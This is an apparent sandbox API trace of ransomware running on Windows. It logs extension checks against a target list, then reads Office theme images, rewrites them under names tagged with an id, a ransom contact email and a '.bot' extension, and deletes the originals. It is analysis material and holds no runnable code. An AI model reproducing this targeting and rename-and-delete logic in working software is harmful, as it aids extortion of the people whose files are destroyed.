	[0044.041] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.041] lstrlenW (lpString=".ppt") returned 4
	[0044.041] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.041] lstrlenW (lpString=".zip") returned 4
	[0044.041] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.041] lstrlenW (lpString=".rar") returned 4
	[0044.041] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.041] lstrlenW (lpString=".bz2") returned 4
	[0044.041] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.041] lstrlenW (lpString=".7z") returned 3
	[0044.041] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.041] lstrlenW (lpString=".dbf") returned 4
	[0044.041] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.041] lstrlenW (lpString=".1cd") returned 4
	[0044.041] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.041] lstrlenW (lpString=".jpg") returned 4
	[0044.041] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.041] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.041] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.312] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=60724) returned 1
	[0044.313] CloseHandle (hObject=0x1cc) returned 1
	[0044.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 0x20
	[0044.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.313] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.313] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0044.313] GetLastError () returned 0x0
	[0044.313] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xed34, lpOverlapped=0x0) returned 1
	[0044.316] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xed40, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xed40, lpOverlapped=0x0) returned 1
	[0044.318] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.318] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.318] SetEndOfFile (hFile=0x194) returned 1
	[0044.318] CloseHandle (hObject=0x194) returned 1
	[0044.318] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.318] SetEndOfFile (hFile=0x1cc) returned 1
	[0044.319] CloseHandle (hObject=0x1cc) returned 1
	[0044.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.319] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1
	[0044.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.320] lstrlenW (lpString=".doc") returned 4
	[0044.320] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.320] lstrlenW (lpString=".docx") returned 5
	[0044.320] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.320] lstrlenW (lpString=".pdf") returned 4
	[0044.320] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.320] lstrlenW (lpString=".xls") returned 4
	[0044.320] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.320] lstrlenW (lpString=".xlsx") returned 5
	[0044.320] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.320] lstrlenW (lpString=".ppt") returned 4
	[0044.320] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.320] lstrlenW (lpString=".zip") returned 4
	[0044.320] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.320] lstrlenW (lpString=".rar") returned 4
	[0044.320] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.320] lstrlenW (lpString=".bz2") returned 4
	[0044.320] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.320] lstrlenW (lpString=".7z") returned 3
	[0044.320] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.320] lstrlenW (lpString=".dbf") returned 4
	[0044.320] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.320] lstrlenW (lpString=".1cd") returned 4
	[0044.320] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.320] lstrlenW (lpString=".jpg") returned 4
	[0044.321] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.321] lstrlenW (lpString=".doc") returned 4
	[0044.321] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.321] lstrlenW (lpString=".docx") returned 5
	[0044.321] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.321] lstrlenW (lpString=".pdf") returned 4
	[0044.321] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.321] lstrlenW (lpString=".xls") returned 4
	[0044.321] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.321] lstrlenW (lpString=".xlsx") returned 5
	[0044.321] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.321] lstrlenW (lpString=".ppt") returned 4
	[0044.321] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.321] lstrlenW (lpString=".zip") returned 4
	[0044.321] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.321] lstrlenW (lpString=".rar") returned 4
	[0044.321] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.321] lstrlenW (lpString=".bz2") returned 4
	[0044.321] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.321] lstrlenW (lpString=".7z") returned 3
	[0044.321] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.321] lstrlenW (lpString=".dbf") returned 4
	[0044.321] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.321] lstrlenW (lpString=".1cd") returned 4
	[0044.321] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77
	[0044.321] lstrlenW (lpString=".jpg") returned 4
	[0044.321] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.322] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.322] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.323] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=18817) returned 1
	[0044.323] CloseHandle (hObject=0x1cc) returned 1
	[0044.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 0x20
	[0044.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.323] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.323] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0044.323] GetLastError () returned 0x0
	[0044.323] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x4981, lpOverlapped=0x0) returned 1
	[0044.325] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x4990, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x4990, lpOverlapped=0x0) returned 1
	[0044.327] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.327] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.327] SetEndOfFile (hFile=0x194) returned 1
	[0044.327] CloseHandle (hObject=0x194) returned 1
	[0044.327] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.327] SetEndOfFile (hFile=0x1cc) returned 1
	[0044.328] CloseHandle (hObject=0x1cc) returned 1
	[0044.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.328] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1
	[0044.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.328] lstrlenW (lpString=".doc") returned 4
	[0044.328] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.328] lstrlenW (lpString=".docx") returned 5
	[0044.328] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.328] lstrlenW (lpString=".pdf") returned 4
	[0044.329] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.329] lstrlenW (lpString=".xls") returned 4
	[0044.329] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.329] lstrlenW (lpString=".xlsx") returned 5
	[0044.329] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.329] lstrlenW (lpString=".ppt") returned 4
	[0044.329] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.329] lstrlenW (lpString=".zip") returned 4
	[0044.329] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.329] lstrlenW (lpString=".rar") returned 4
	[0044.329] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.329] lstrlenW (lpString=".bz2") returned 4
	[0044.329] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.329] lstrlenW (lpString=".7z") returned 3
	[0044.329] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.329] lstrlenW (lpString=".dbf") returned 4
	[0044.329] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.329] lstrlenW (lpString=".1cd") returned 4
	[0044.329] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.329] lstrlenW (lpString=".jpg") returned 4
	[0044.329] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.329] lstrlenW (lpString=".doc") returned 4
	[0044.329] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.329] lstrlenW (lpString=".docx") returned 5
	[0044.329] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.329] lstrlenW (lpString=".pdf") returned 4
	[0044.329] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.330] lstrlenW (lpString=".xls") returned 4
	[0044.330] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.330] lstrlenW (lpString=".xlsx") returned 5
	[0044.330] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.330] lstrlenW (lpString=".ppt") returned 4
	[0044.330] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.330] lstrlenW (lpString=".zip") returned 4
	[0044.330] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.330] lstrlenW (lpString=".rar") returned 4
	[0044.330] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.330] lstrlenW (lpString=".bz2") returned 4
	[0044.330] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.330] lstrlenW (lpString=".7z") returned 3
	[0044.330] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.330] lstrlenW (lpString=".dbf") returned 4
	[0044.330] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.330] lstrlenW (lpString=".1cd") returned 4
	[0044.330] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72
	[0044.330] lstrlenW (lpString=".jpg") returned 4
	[0044.330] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.330] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.330] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.331] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=5179) returned 1
	[0044.331] CloseHandle (hObject=0x1cc) returned 1
	[0044.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 0x20
	[0044.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0044.331] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.331] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0044.333] GetLastError () returned 0x0
	[0044.333] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x143b, lpOverlapped=0x0) returned 1
	[0044.335] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1440, lpOverlapped=0x0) returned 1
	[0044.336] ReadFile (in: hFile=0x1cc, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.336] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.336] SetEndOfFile (hFile=0x194) returned 1
	[0044.336] CloseHandle (hObject=0x194) returned 1
	[0044.336] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.336] SetEndOfFile (hFile=0x1cc) returned 1
	[0044.337] CloseHandle (hObject=0x1cc) returned 1
	[0044.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.337] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 1
	[0044.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString=".doc") returned 4
	[0044.338] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.338] lstrlenW (lpString=".docx") returned 5
	[0044.338] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.338] lstrlenW (lpString=".pdf") returned 4
	[0044.338] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.338] lstrlenW (lpString=".xls") returned 4
	[0044.338] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.338] lstrlenW (lpString=".xlsx") returned 5
	[0044.338] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.338] lstrlenW (lpString=".ppt") returned 4
	[0044.338] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString=".zip") returned 4
	[0044.338] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.338] lstrlenW (lpString=".rar") returned 4
	[0044.338] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.338] lstrlenW (lpString=".bz2") returned 4
	[0044.338] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.338] lstrlenW (lpString=".7z") returned 3
	[0044.338] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString=".dbf") returned 4
	[0044.338] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString=".1cd") returned 4
	[0044.338] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString=".jpg") returned 4
	[0044.338] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74
	[0044.338] lstrlenW (lpString=".doc") returned 4
